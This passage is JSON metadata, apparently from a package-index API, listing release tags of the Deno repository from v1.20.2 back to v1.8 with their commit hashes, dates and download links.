tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b